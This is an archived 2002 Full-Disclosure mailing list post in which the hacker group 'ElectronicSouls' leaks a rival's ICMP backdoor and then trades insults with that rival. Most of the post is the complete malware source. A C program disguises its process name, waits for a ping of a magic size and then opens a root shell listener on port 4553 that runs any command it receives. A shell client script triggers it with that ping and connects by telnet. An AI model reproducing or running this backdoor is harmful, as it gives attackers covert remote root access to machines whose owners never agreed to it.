lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200212010103.gB113ENe035516@mailserver4.hushmail.com>
From: electronicsouls at hushmail.com (electronicsouls@...hmail.com)
Subject: Fwd: Fwd: Re: Re: Re: ELECTRONICSOULS POSTS ARE FAKE !!

-----BEGIN PGP SIGNED MESSAGE-----

'icmp backdoor"

# tar zxvf 4553-icmp-bd2.tar.gz
4553-icmp-bd/
4553-icmp-bd/icmp.bd.c
4553-icmp-bd/README
4553-icmp-bd/client.sh
# cd 4553-icmp-bd
# cat README


 DO NOT FSCKING DISTRIBUTE !!

 PROPERTY OF THE ELECTRONICSOULS CREW.
 THIS MAY NOT BE PUBLISHED,DISCLOSED OR REDISTRIBUTED
 WITHOUT WRITTEN PERMISSION OF ES !!

 (C) BrainStorm & Ares

 THIS IS FOR 0x4553 MEMBERS ONLY !
 THE CODE IS IN BETA !

 VERSION: 0.2

# cat client.sh
#!/bin/sh
#
# this client is just a test client,
# maybe i code one in C who knows..
# but doing it by hand shouldnt be too much work tho :P

echo "ElectronicSouls icmp bd client"

if [ "$2" = "" ]
   then
       echo "usage: $0 <host> <port>"
   exit
fi

echo "sending magic packet.."
ping -s 4553 -c 1 $1
echo "trying to connect to: $1"
telnet $1 $2

# cat icmp.bd.c


/* 0x5345 / 0x4553 / 0x5345 / 0x4553 / 0x5345 / 0x4553 /
 *
 *         PRIVATE SOURCE MATERIAL OF 0x4553!!
 *
 *            ElectronicSouls ICMP backdoor
 *            +++++++++++++++++++++++++++++
 * usage:
 * The packet size you choose is our magic packet.
 * lets say we use "1024" to start the backdoor,
 * ping the target host with "-s 1024" for example.
 *
 *                DO NOT DISTRIBUTE !!@#
 * 0x5345 / 0x4553 / 0x5345 / 0x4553 / 0x5345 / 0x4553 /
 *             -- (C) BrainStorm & Ares --
 */


#include <stdio.h>
#include <signal.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <fcntl.h>

#define MAGIC 4553
#define fake "proc"
#define port 4553
#define prepare(buf) fgets(buf,256,stdin);if(*buf) buf[strlen(buf)-2]='\0';

int pack_size,s,size,lenght,prt;
char packet[9000],c[256];
pid_t pid;
int run(prt)
{
  int soc,
      cli;

  struct sockaddr_in serv_addr;
  setuid(0);setgid(0);seteuid(0);setegid(0);

  if((pid=fork())==0) /* start of the portshell */
  {
        serv_addr.sin_family=2;
        serv_addr.sin_addr.s_addr=0;
        serv_addr.sin_port=htons(port);
        soc=socket(2,1,6);
        bind(soc,(struct sockaddr *)&serv_addr,0x10);
        listen(soc,1);
        cli=accept(soc,0,0);
        dup2(cli,0);
        dup2(cli,1);
        dup2(cli,2);
	for(;;)
	 {
    	    write(0,"\nsh$ ",5);
	    prepare(c);
	    if(!strcmp(c,"exit")){close(soc);exit(0);}
	    system(c);
	    bzero(c,0);
	 }
  }
       pid=wait(NULL);
       close(soc);

}

int main(int argc, char *argv[])
{

  struct protoent *prot;
  struct sockaddr_in sockadd;
  bzero(argv[0],strlen(argv[0]));
  strcpy(argv[0],fake);
  if(argc < 1) {
  printf("\n ElectronicSouls ICMP backdoor \n usage: %s <magic-packet> (default:4553) \n", argv[0]);
  exit(0);
  }

  pack_size = MAGIC;    //atoi(argv[2]);
  signal(SIGHUP,SIG_IGN);
  prot = getprotobyname("icmp");
  for(;;)
   {
    if ((s = socket(AF_INET, SOCK_RAW, prot->p_proto)) < 0) exit(0);
    do
     {
       lenght = sizeof(sockadd);
       if ((size = recvfrom(s, packet, sizeof(packet), 0,
           (struct sockaddr *) &sockadd, &lenght)) < 0)
       printf("ping of %i\n", size-28);
     }
      while (size != pack_size+28);
	      run(port);
  }

}

#

Please, fake BrainStorm, stop trying to discredit us, before we are
forced to show off your hacking logs gathered from script + screen -x.

We know who you are.

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"Bigger.  Badder.  Impotent."

- ----- Forwarded Message from es@...h.com -----



- ----- Forwarded Message from Brain Storm <brainstorm@...ctronicSouls.zzn.com> -----
umm whatever you are just sad ..what you got is leaked stuff from a
old ftp dump ..why dont you release one of the ELF infector (no not
invader f00ls :P) or the icmp backdoor, or one of the ptrace codes
(nope not annoy.c) ? its because you got our old stuff that was made
the last 7 years ..some shit that you released is indeed from 2002
.but thats just stupid PoC stuff that can be released anyway ..and
you even post fake shit ..admit it kiddies ..whatever you are just
lame and if someone makes fun of a code that i made 7 years ago when i
started then i dont give a shit since those ppl like you are retard
.and you dont even have the balls to say who you really are ..go get
a life instead of sitting in front of your system 24/7 and pretend to
be someone on irc..you have to make fun of other ppls old codes for
your ego ..whatever we can just laugh about so much lameness

Get your own Free ES E-mail account at : Http://electronicsouls.zzn.com
___________________________________________________________
Get your own Web-based E-mail Service at http://www.zzn.com





Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Big $$$ to be made with the HushMail Affiliate Program:
https://www.hushmail.com/about.php?subloc=affiliate&l=427


-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wmQEARECACQFAj3pX+4dHGVsZWN0cm9uaWNzb3Vsc0BodXNobWFpbC5jb20ACgkQ39CI
8XTNSM5V2wCdE97kBlPpyY412FJ35HqBIY8O3P8An0s82JOM8lWEo2GOdknGiHK+CDBG
=vfEc
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ